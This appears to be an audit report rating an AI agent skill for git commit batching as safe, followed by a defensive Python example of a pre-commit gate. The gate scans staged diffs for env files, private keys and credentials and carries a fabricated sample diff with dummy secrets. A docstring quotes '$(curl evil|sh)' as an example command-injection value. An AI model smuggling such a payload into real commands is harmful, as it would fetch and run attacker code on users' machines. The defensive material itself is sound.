conventional-commit-batcher

Pass

Audited by Gen Agent Trust Hub on Apr 5, 2026

Risk Level: SAFE
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes local shell commands and Python scripts as part of its core functionality. Specifically, scripts/precommit_safety_gate.py and scripts/validate_conventional_commit.py use the subprocess module to interact with Git. These calls are implemented using secure practices (e.g., passing arguments as lists and avoiding shell=True) to prevent command injection.
  • [COMMAND_EXECUTION]: The skill defines mandatory interception for git add, git commit, and git push operations. It uses platform-specific mechanisms (like Kiro's preToolUse hooks) to ensure the agent follows the batching and safety-check workflow before executing these commands.
  • [SAFE]: The skill includes explicit instructions and code to detect and prevent the exposure of sensitive data. It scans Git diffs for patterns matching environment files, private keys, and hardcoded credentials, requiring explicit human confirmation if any are found.
  • [SAFE]: The 'auto-execute' behavior is mitigated by hard-coded safety gates that force a pause and require user approval for high-risk actions, such as committing to protected branches or including large binary files.
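The findings above describe three mechanisms: list-form subprocess calls to git, a scan of the staged diff for env files, private keys and hardcoded credentials, and hard gates on protected branches and large binaries. The following is an added example written for this page to show what such a gate looks like end to end; it is not code from the conventional-commit-batcher skill or its scripts/precommit_safety_gate.py. The regexes, the protected-branch set, the 1 MB binary threshold, the function names and the sample diff are all assumptions constructed for illustration.

```python
"""Pre-commit safety gate sketch (example code, not the skill's own)."""
import re
import subprocess

# Assumed values for this example; the skill's real settings are not on the page.
PROTECTED_BRANCHES = {"main", "master", "release"}
MAX_BINARY_BYTES = 1_000_000

# Assumed detection patterns: env files by path, private keys and quoted
# credential literals by the content of added ("+") lines only.
ENV_FILE_RE = re.compile(r"(?:^|/)\.env(?:\.[\w-]+)?$")
PRIVATE_KEY_RE = re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")
CREDENTIAL_RE = re.compile(
    r"(?:password|passwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"][^'\"]{8,}['\"]",
    re.IGNORECASE,
)


def run_git(args, cwd="."):
    """Invoke git with an argument list and no shell.

    With shell=False a branch name or path such as '$(curl evil|sh)' stays a
    literal argument. The injectable form this avoids would be
    subprocess.run("git " + " ".join(args), shell=True).
    """
    proc = subprocess.run(["git", *args], cwd=cwd, capture_output=True,
                          text=True, check=True)
    return proc.stdout


def scan_diff(diff_text):
    """Return (category, path) findings for a unified diff of staged changes."""
    findings = []
    current = None
    for line in diff_text.splitlines():
        if line.startswith("+++ b/"):
            current = line[len("+++ b/"):]
            if ENV_FILE_RE.search(current):
                findings.append(("env_file", current))
            continue
        # Only added lines are scanned; "+++" headers, context and removals skip.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        if PRIVATE_KEY_RE.search(added):
            findings.append(("private_key", current))
        elif CREDENTIAL_RE.search(added):
            findings.append(("credential", current))
    return findings


def evaluate_gate(branch, diff_text, staged_binaries):
    """Diff findings plus the hard gates. staged_binaries: {path: size_bytes}.

    A non-empty result means the agent must pause for human confirmation.
    """
    findings = scan_diff(diff_text)
    if branch in PROTECTED_BRANCHES:
        findings.append(("protected_branch", branch))
    for path, size in staged_binaries.items():
        if size > MAX_BINARY_BYTES:
            findings.append(("large_binary", path))
    return findings


def gate_from_repo(cwd="."):
    """Live variant: reads branch, staged diff and binary sizes from a real repo."""
    branch = run_git(["rev-parse", "--abbrev-ref", "HEAD"], cwd).strip()
    diff = run_git(["diff", "--cached"], cwd)
    binaries = {}
    for row in run_git(["diff", "--cached", "--numstat"], cwd).splitlines():
        added, removed, path = row.split("\t", 2)
        if added == "-" and removed == "-":   # numstat reports binaries as "-"
            binaries[path] = int(run_git(["cat-file", "-s", f":{path}"], cwd))
    return evaluate_gate(branch, diff, binaries)


# Constructed sample diff for offline demonstration (not from a real repository).
SAMPLE_DIFF = """\
diff --git a/config/.env b/config/.env
new file mode 100644
--- /dev/null
+++ b/config/.env
@@ -0,0 +1,2 @@
+DB_PASSWORD="hunter2hunter2"
+API_KEY = "sk-live-0123456789abcdef"
diff --git a/deploy/id_rsa b/deploy/id_rsa
new file mode 100644
--- /dev/null
+++ b/deploy/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAA
+-----END OPENSSH PRIVATE KEY-----
diff --git a/src/app.py b/src/app.py
--- a/src/app.py
+++ b/src/app.py
@@ -1,2 +1,2 @@
-password = os.environ["DB_PASSWORD"]
+password = os.environ.get("DB_PASSWORD", "")
"""

if __name__ == "__main__":
    for finding in evaluate_gate("main", SAMPLE_DIFF, {"assets/model.bin": 5_000_000}):
        print(*finding)
```

Two caveats worth keeping in mind when reading the audit's "secure practices" bullet. List-form arguments close the shell-injection hole, but they do not stop git itself from parsing an argument that begins with `-` as an option; whenever a path or ref comes from untrusted input it should be placed after a `--` separator. And the credential regex above deliberately requires a quoted literal, so the `os.environ.get(...)` hunk in the sample is not flagged; a looser pattern would catch more real secrets at the cost of blocking ordinary code, which is the trade-off any such gate has to tune.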
Audit Metadata
Risk Level: SAFE
Analyzed: Apr 5, 2026, 11:02 AM